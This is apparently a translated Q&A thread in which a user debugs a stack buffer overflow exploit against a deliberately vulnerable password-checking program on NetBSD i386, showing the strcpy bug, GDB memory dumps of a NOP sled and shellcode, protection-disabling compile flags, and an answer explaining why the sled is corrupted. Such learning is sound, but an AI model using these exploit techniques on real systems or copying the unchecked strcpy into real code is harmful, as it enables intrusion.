5

我试图利用测试程序中的缓冲区溢出来执行任意代码。我在 NetBSD 6 i386 上。这是C代码:

int checkPassword(char *password)
{
  char                  savePassword[64] = {0};
  char                  *logMessage;
  int                   isUser = 0;
  int                   isAdmin = 0;
  int                   i;

  if (!strcmp(password, userPassword))
    isUser = 1;
  strcpy(savePassword, password);  
  for (i = 0; password[i]; ++i)
    password[i] ^= xorKey;
  if (!strcmp(password, adminPassword))
    isAdmin = 1;
  if (!(isAdmin | isUser)) {
    /* ... */
  }
  return isAdmin ? ADMIN : isUser ? USER : NOBODY; /* main.c:79 */
}

我将代码插入savePassword缓冲区(at %ebp - 0x58)。这是使用 GDB 进行的调试:

# gdb -q ./pepito
Reading symbols from /root/Pepito/source/pepito...done.
(gdb) b main.c:79
Breakpoint 1 at 0x80490f4: file main.c, line 79.
(gdb) r debug
Starting program: /root/Pepito/source/pepito debug
Daemon started

Breakpoint 1, checkPassword (password=0xbb901000 '�' <repeats 57 times>, "\345Q?Y?\005?T?T�\r\345Td3\a?T�\035\060\071\071:u\":'91_-\352\352") at main.c:79
79        return isAdmin ? ADMIN : isUser ? USER : NOBODY;

我打破了函数返回,然后确保在堆栈上正确写入了任意代码(96 字节长度):

(gdb) x/96xb $ebp-0x58
0xbfbfd560:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbfd568:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbfd570:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbfd578:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbfd580:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbfd588:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbfd590:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xbfbfd598:     0x90    0xb0    0x04    0x6a    0x0c    0x6a    0x50    0x6a
0xbfbfd5a0:     0x01    0x6a    0x01    0xcd    0x60    0x00    0x00    0x00
0xbfbfd5a8:     0x31    0xd2    0x66    0x52    0x6a    0x01    0xcd    0x80
0xbfbfd5b0:     0x48    0x65    0x6c    0x6c    0x6f    0x20    0x77    0x6f
0xbfbfd5b8:     0x72    0x6c    0x64    0x0a    0x78    0xd5    0xbf    0xbf

然后我继续直到ret汇编指令:

(gdb) nexti
(gdb) nexti
(gdb) nexti
(gdb) nexti
(gdb) nexti
(gdb) nexti
(gdb) nexti
(gdb) x/i $eip 
=> 0x8049119 <checkPassword+393>:       ret

然后我检查堆栈顶部的返回地址(at %esp):

(gdb) x/xw $esp
0xbfbfd5bc:     0xbfbfd578

这个地址将被弹出ret,然后我们将跳转到它。让我们看看我们在该地址的说明:

(gdb) x/50i 0xbfbfd578
   0xbfbfd578:  nop
   0xbfbfd579:  nop
   0xbfbfd57a:  nop
   [...]
   0xbfbfd597:  nop
   0xbfbfd598:  nop
   0xbfbfd599:  mov    al,0x4
   0xbfbfd59b:  push   0xc
   0xbfbfd59d:  push   0x50
   0xbfbfd59f:  push   0x1
   0xbfbfd5a1:  push   0x1
   0xbfbfd5a3:  int    0x60

我们的任意代码!

但是如果我执行ret它的段错误:

(gdb) nexti 

Program received signal SIGSEGV, Segmentation fault.
0x08049119 in checkPassword (password=0xbb901000 '�' <repeats 57 times>, "\345Q?Y?\005?T?T�\r\345Td3\a?T�\035\060\071\071:u\":'91_-\352\352") at main.c:80
80      }
(gdb) x/i $eip
=> 0x8049119 <checkPassword+393>:       ret

操作系统似乎禁止我跳转堆栈内存。但我禁用了不可执行的堆栈保护:

gcc -m32 -g -fno-stack-protector -D_FORTIFY_SOURCE=0  -c main.c
gcc main.o daemon.o network.o utils.o -o pepito -m32 -L./lib_netbsd -lsecret -Wl,-rpath,./lib_netbsd -Wl,-z,execstack

readelf向我们确认堆栈是可执行的:

# readelf -l pepito

Elf file type is EXEC (Executable file)
Entry point 0x8048d60
There are 7 program headers, starting at offset 52

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  [...]
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4
4

1 回答 1

-1

在我的盒子上,通过strcpy调用溢出savePassword之后。我得到以下指示:

0x80484ba : 移动$0x0, -0x14 (%ebp)

它对应于局部变量i初始化为 0

for (i = 0; password[i]; ++i)

这破坏了注入代码中的 NOP sled,从而在执行期间引发了段错误。看看你的身边。如果它是相同的(我几乎可以肯定它是),那么您可以简单地将您的 shellcode 移动到有效负载的开头并摆脱 NOP 雪橇。

正如 Fermat2357 所说,考虑在 ret 指令之前发布函数转储以及整个有效负载。

海合会:

gcc 版本 4.8.0 20130502(预发行版)(GCC)

编译:

gcc -m32 -ggdb -fno-stack-protector -z execstack -D_FORTIFY_SOURCE=0 vuln.c -o vuln

片段

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#define ADMIN  2
#define USER   1
#define NOBODY 0

char* userPassword = "S3cuRe";
char* adminPassword = "4dm1n";
int xorKey = 0;

int checkPassword(char *password)
{
        char savePassword[64] = {0};
        char *logMessage;
        int  isUser = 0;
        int  isAdmin = 0;
        int  i;

        if (!strcmp(password, userPassword))
                isUser = 1;
        strcpy(savePassword, password);
        for (i = 0; password[i]; ++i)
                password[i] ^= xorKey;
        if (!strcmp(password, adminPassword))
                isAdmin = 1;
        if (!(isAdmin | isUser)) {
        }

        return isAdmin ? ADMIN : isUser ? USER : NOBODY;
}

void main(int argc, char *argv[])
{
        int user = NOBODY;
        user = checkPassword(argv[1]);
        printf("Hello %d\n", user);
}
于 2013-05-21T10:48:21.160 回答